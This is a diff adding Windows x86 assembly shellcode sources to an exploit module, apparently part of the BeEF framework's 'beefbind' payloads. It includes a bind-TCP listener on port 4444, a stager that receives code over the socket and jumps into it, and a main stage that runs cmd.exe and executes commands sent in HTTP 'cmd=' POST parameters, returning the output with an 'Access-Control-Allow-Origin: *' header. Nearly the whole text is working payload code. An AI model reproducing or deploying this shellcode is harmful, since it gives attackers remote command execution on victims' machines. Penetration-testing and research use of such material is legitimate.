@@ -0,0 +1,177 @@
;-----------------------------------------------------------------------------;
; Author: Ty Miller @ Threat Intelligence
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (2nd December 2011)
;-----------------------------------------------------------------------------;
[BITS 32]
;INPUT: EBP is block_api.
%include "src/block_virtualalloc.asm"
; Input: None
; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000
; Clobbers: EAX, EBX, ECX, EDX
mov esi, eax ; point esi to start of buffer, used as pseudo-frame pointer
%include "src/block_pipes.asm"
; Create pipes to redirect stage stdin, stdout, stderr
; Input: EBP is api_call
; Output:
; esp+00 child stdin read file descriptor (inherited)
; esp+04 child stdin write file descriptor (not inherited)
; esp+08 child stdout read file descriptor (not inherited)
; esp+12 child stdout write file descriptor (inherited)
; esp+16 lpPipeAttributes structure (not used after block - 12 bytes)
; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
mov edi,esi ; save esi since it gets clobbered
%include "src/block_shell_pipes.asm"
; Create process with redirected stdin, stdout, stderr to our pipes
; Input:
; EBP is api_call
; esp+00 child stdin read file descriptor (inherited)
; esp+04 not used
; esp+08 not used
; esp+12 child stdout write file descriptor (inherited)
; Output: None.
; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified
mov esi,edi ; restore esi
ReadLoop: ; Read output from the child process
clear_buffer:
mov ecx,0xFF8 ; zero output buffer starting at esi+8 with 0xFF8 nulls
lea eax,[esi+8] ; point eax to start of command/output buffer
zero_buffer:
mov byte [eax],0 ; push a null dword
inc eax ; point to the next byte in the buffer
loop zero_buffer ; keep looping untill we have zeroed the buffer
response_headers:
push esi ; save pointer to start of buffer
lea edi,[esi+1048] ; set pointer to output buffer
call get_headers ; locate the static http response headers
db 'HTTP/1.1 200 OK', 0x0d, 0x0a, 'Content-Type: text/html', 0x0d, 0x0a, 'Access-Control-Allow-Origin: *', 0x0d, 0x0a, 'Content-Length: 3016', 0x0d, 0x0a, 0x0d, 0x0a
get_headers:
pop esi ; get pointer to response headers into esi
mov ecx, 98 ; length of http response headers
rep movsb ; move the http headers into the buffer
pop esi ; restore pointer to start of buffer
bind_port:
push esi ; save buffer pointer onto stack
%include "src/block_bind_tcp.asm" ;by here we will have performed the bind_tcp connection to setup our external web socket
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the newly connected clients socket
; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
add esp, 0x1A0 ; restore stack pointer
pop esi ; restore buffer pointer
mov [esi], edi ; save external socket to buffer
recv: ; Receive the web request - must be a post request with command ending with a new line character
push byte 0 ; flags
push 0x400 ; allocated space for command (512 bytes)
mov ebx, esi ; start of our request/response memory buffer
add ebx, 8 ; start of our allocated command space
push ebx ; start of our allocated command space
push dword [esi] ; external socket
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
call ebp ; recv( external_socket, buffer, size, 0 );
find_cmd: ; Search for "cmd=" in the web request
mov edx, [esp+0x64] ; stage stdin read file descriptor (40)
mov ecx, 0x400 ; set ecx to be our buffer counter
next:
cmp dword [ebx], 0x3d646d63 ; check if ebx points to "cmd="
jz cmd_found ; if we found "cmd=" then parse the command
inc ebx ; point ebx to next char in request data
dec ecx ; dec our buffer counter
jecxz read_file_check ; if our counter is 0 then we found no command, so recv more data
jmp short next ; check next location for "cmd="
cmd_found: ; now pointing to start of our command - MAY fail if the command is cut off
add ebx, 0x03 ; starts off pointing at "cmd=" so add 3 (plus inc eax below) to point to command
next_cmd_char:
inc ebx ; move our command string pointer up one character
push ebx ; save command pointer to the stack
write_file:
push 0 ; pOverlapped = NULL
lea edi,[esi+1040] ; 4 bytes for bytes written
push edi ; pBytesWritten
push 1 ; nBytesToWrite
push ebx ; command string in buffer
mov ebx,[esp+70h] ; Child stdin
push ebx ; child stdin
push 0x5BAE572D ; hash(kernel32.dll, WriteFile)
call ebp ; WriteFile
pop ebx ; restore command pointer from the stack
cmp byte [ebx], 0x0a ; check if we have just sent a new line
jnz next_cmd_char ; if we haven't finished sending the cmd then send the next char, else we want to read the cmd output from internal stage socket
%include "src/block_sleep.asm"
; Input: None
; Output: None. Sleeps for x seconds
; Clobbers: None
read_file_check:
xor eax, eax ; zero eax
push eax ; lpBytesLeftThisMessage
lea ebx,[esi+4] ; address to output the result - num bytes available to read
push ebx ; lpTotalBytesAvail
push eax ; lpBytesRead
push eax ; nBufferSize
push eax ; lpBuffer
lea ebx,[esp+74h] ; child stdout read address
mov ebx, [ebx] ; child stdout read file descriptor
push ebx ; hNamedPipe
push 0xB33CB718 ; hash(kernel32.dll,PeekNamedPipe)
call ebp ; PeekNamedPipe
test eax, eax ; check the function return correctly
jz close_handle ; no, then close the connection and start again
mov eax, [esi+4] ; Grab the number of bytes available
test eax, eax ; check for no bytes to read
jz close_handle ; no, then close the connection and start again
read_file:
push 0 ; pOverlapped = NULL
lea edi,[esi+1044] ; output: number of bytes read
push edi ; pBytesRead
push 0xB86 ; BytesToRead: remaining space in our allocated buffer
;lea edi,[esi+1114] ; start of remaining space in buffer after response headers
lea edi,[esi+1146] ; start of remaining space in buffer after response headers
push edi ; start of remaining space in buffer after response headers
lea ebx,[esp+70h] ; child stdout read address
mov ebx, [ebx] ; child stdout read file descriptor
push ebx ; hFile: child stdout address
push 0xBB5F9EAD ; hash(kernel32.dll,ReadFile)
call ebp ; ReadFile
send_output: ; send buffer to the external socket
push byte 0 ; flags
push 0xBE8 ; len
lea edi,[esi+1048] ; start of output buffer
push edi ; pointer to buffer
push dword [esi] ; external socket
push 0x5F38EBC2 ; hash ( "ws2_32.dll", "send" )
call ebp ; send(external_socket, *buf, len, flags);
close_handle:
push dword [esi] ; hObject: external socket
push 0x528796C6 ; hash(kernel32.dll,CloseHandle)
call ebp ; CloseHandle
jmp ReadLoop

47
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm Normal file
View File

@@ -0,0 +1,47 @@
;-----------------------------------------------------------------------------;
; Author: Ty Miller @ Threat Intelligence
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (2nd December 2011)
;-----------------------------------------------------------------------------;
[BITS 32]
;INPUT: EBP is block_api.
%include "src/block_bind_tcp.asm" ;by here we will have performed the bind_tcp connection to setup our external web socket
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the newly connected clients socket
; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
%include "src/block_virtualalloc.asm"
; Input: None
; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX has value 0x1000
; Clobbers: EAX, EBX, ECX, EDX
mov esi, eax ; save pointer to buffer since eax gets clobbered
recv: ; Receive the web request containing the stage
push byte 0 ; flags
push ebx ; allocated space for stage
push eax ; start of our allocated command space
push edi ; external socket
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
call ebp ; recv( external_socket, buffer, size, 0 );
close_handle:
push edi ; hObject: external socket
push 0x528796C6 ; hash(kernel32.dll,CloseHandle)
call ebp ; CloseHandle
find_cmd: ; Search for "cmd=" in the web request for our payload
cmp dword [esi], 0x3d646d63 ; check if ebx points to "cmd="
jz cmd_found ; if we found "cmd=" then parse the command
inc esi ; point ebx to next char in request data
jmp short find_cmd ; check next location for "cmd="
cmd_found: ; now pointing to start of our command - MAY fail if the command is cut off
; add esi,4 ; starts off pointing at "cmd=" so add 3 (plus inc eax below) to point to command ... this compiles to 6 byte opcode
db 0x83, 0xC6, 0x04 ; add esi,4 ... but only 3 byte opcode
jmp esi ; jump to our stage payload

63
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm Normal file
View File

@@ -0,0 +1,63 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the newly connected clients socket
; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
bind_tcp:
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
push 0x5F327377 ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "ws2_32" )
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this stuct
push eax ; push the wVersionRequested parameter
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
call ebp ; WSAStartup( 0x0190, &WSAData );
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
push eax ; push null for reserved parameter
push eax ; we do not specify a WSAPROTOCOL_INFO structure
push eax ; we do not specify a protocol
inc eax ;
push eax ; push SOCK_STREAM
inc eax ;
push eax ; push AF_INET
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
xor ebx, ebx ; Clear EBX
push ebx ; bind to 0.0.0.0
push 0x5C110002 ; family AF_INET and port 4444
mov esi, esp ; save a pointer to sockaddr_in struct
push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
push esi ; pointer to the sockaddr_in struct
push edi ; socket
push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" )
call ebp ; bind( s, &sockaddr_in, 16 );
push ebx ; backlog
push edi ; socket
push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" )
call ebp ; listen( s, 0 );
push ebx ; we set length for the sockaddr struct to zero
push ebx ; we dont set the optional sockaddr param
push edi ; listening socket
push 0xE13BEC74 ; hash( "ws2_32.dll", "accept" )
call ebp ; accept( s, 0, 0 );
push edi ; push the listening socket to close
xchg edi, eax ; replace the listening socket with the new connected socket for further comms
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
call ebp ; closesocket( s );

64
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm Normal file
View File

@@ -0,0 +1,64 @@
;-----------------------------------------------------------------------------;
; Author: Ty Miller @ Threat Intelligence
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (2nd December 2011)
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP is api_call
; Output:
; esp+00 child stdin read file descriptor (inherited)
; esp+04 child stdin write file descriptor (not inherited)
; esp+08 child stdout read file descriptor (not inherited)
; esp+12 child stdout write file descriptor (inherited)
; esp+16 lpPipeAttributes structure (not used after block - 12 bytes)
; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
push 1 ; create lpPipeAtrributes structure on stack so pipe handles are inherited
push 0
push 0x0C
create_pipe_stdout:
push 0 ; allocate space on stack for child stdout file descriptor
mov ebx, esp ; save location of where the child stdout Write file descriptor will be
push 0 ; allocate space on stack for child stdout file descriptor
mov ecx, esp ; save location of where the child stdout Read file descriptor will be
push 0 ; nSize
lea edi,[esp+12] ; lpPipeAttributes - inherited
push edi
push ebx ; stdout write file descriptor
push ecx ; stdout read file descriptor
push 0x0EAFCF3E ; hash ( "kernel.dll", "CreatePipe" )
call ebp ; CreatePipe( Read, Write, 0, 0 )
create_pipe_stdin:
push 0 ; allocate space on stack for child stdout file descriptor
mov ebx, esp ; save location of where the child stdout Write file descriptor will be
push 0 ; allocate space on stack for child stdout file descriptor
mov ecx, esp ; save location of where the child stdout Read file descriptor will be
push 0 ; nSize
lea edi,[esp+20] ; lpPipeAttributes - inherited
push edi
push ebx ; stdout write file descriptor
push ecx ; stdout read file descriptor
push 0x0EAFCF3E ; hash ( "kernel.dll", "CreatePipe" )
call ebp ; CreatePipe( Read, Write, 0, 0 )
no_inherit_read_handle: ; ensure read and write handles to child proc pipes for are not inherited
mov ebx,[esp+8]
push 0
push 1
push ebx ; hChildStdoutRd is the address we set in the CreatePipe call
push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation)
call ebp ; SetHandleInformation
no_inherit_write_handle:
mov ebx,[esp+4]
push 0
push 1
push ebx ; hChildStdinRw is the address we set in the CreatePipe call
push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation)
call ebp ; SetHandleInformation

56
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm Normal file
View File

@@ -0,0 +1,56 @@
;-----------------------------------------------------------------------------;
; Author: Ty Miller @ Threat Intelligence
; Credits: Some code borrowed from block_shell.asm; Stephen Fewer
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (2nd December 2011)
;-----------------------------------------------------------------------------;
[BITS 32]
; Input:
; EBP is api_call
; esp+00 child stdin read file descriptor (inherited)
; esp+04 not used
; esp+08 not used
; esp+12 child stdout write file descriptor (inherited)
; Output: None.
; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified
shell:
push 0x00646D63 ; push our command line: 'cmd',0
mov ebx, esp ; save a pointer to the command line
push dword [esp+16] ; child stdout write file descriptor for process stderr
push dword [esp+20] ; child stdout write file descriptor for process stdout
push dword [esp+12] ; child stdin read file descriptor for process stdout
xor esi, esi ; Clear ESI for all the NULL's we need to push
push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
pop ecx ; Set ECX for the loop
push_loop: ;
push esi ; push a null dword
loop push_loop ; keep looping untill we have pushed enough nulls
mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure
mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
; perform the call to CreateProcessA
push esp ; Push the pointer to the PROCESS_INFORMATION Structure
push eax ; Push the pointer to the STARTUPINFO Structure
push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
push esi ; We dont specify any dwCreationFlags
inc esi ; Increment ESI to be one
push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
dec esi ; Decrement ESI back down to zero
push esi ; Set lpThreadAttributes to NULL
push esi ; Set lpProcessAttributes to NULL
push ebx ; Set the lpCommandLine to point to "cmd",0
push esi ; Set lpApplicationName to NULL as we are using the command line param instead
push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
call ebp ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
; perform the call to WaitForSingleObject
; mov eax, esp ; save pointer to the PROCESS_INFORMATION Structure
; dec esi ; Decrement ESI down to -1 (INFINITE)
; push esi ; push INFINITE inorder to wait forever
; inc esi ; Increment ESI back to zero
; push dword [eax] ; push the handle from our PROCESS_INFORMATION.hProcess
; push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
; call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );

15
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm Normal file
View File

@@ -0,0 +1,15 @@
;-----------------------------------------------------------------------------;
; Author: Ty Miller @ Threat Intelligence
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (2nd December 2011)
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: None
; Output: None. Sleeps for specified seconds.
; Clobbers: None
push 1000 ; milliseconds
push 0xE035F044 ; hash (kernel32.dll, Sleep)
call ebp ; Sleep(1000ms)

20
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm Normal file
View File

@@ -0,0 +1,20 @@
;-----------------------------------------------------------------------------;
; Author: Ty Miller @ Threat Intelligence
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (2nd December 2011)
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: None
; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000
; Clobbers: EAX, EBX, ECX, EDX
mov ebx,0x1000 ; setup our flags and buffer size in ebx
allocate_memory: ; Alloc a buffer for the request and response data
push byte 0x40 ; PAGE_EXECUTE_READWRITE - don't need execute but may as well
push ebx ; MEM_COMMIT
push ebx ; size of memory to be allocated (4096 bytes)
push byte 0 ; NULL as we dont care where the allocation is
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );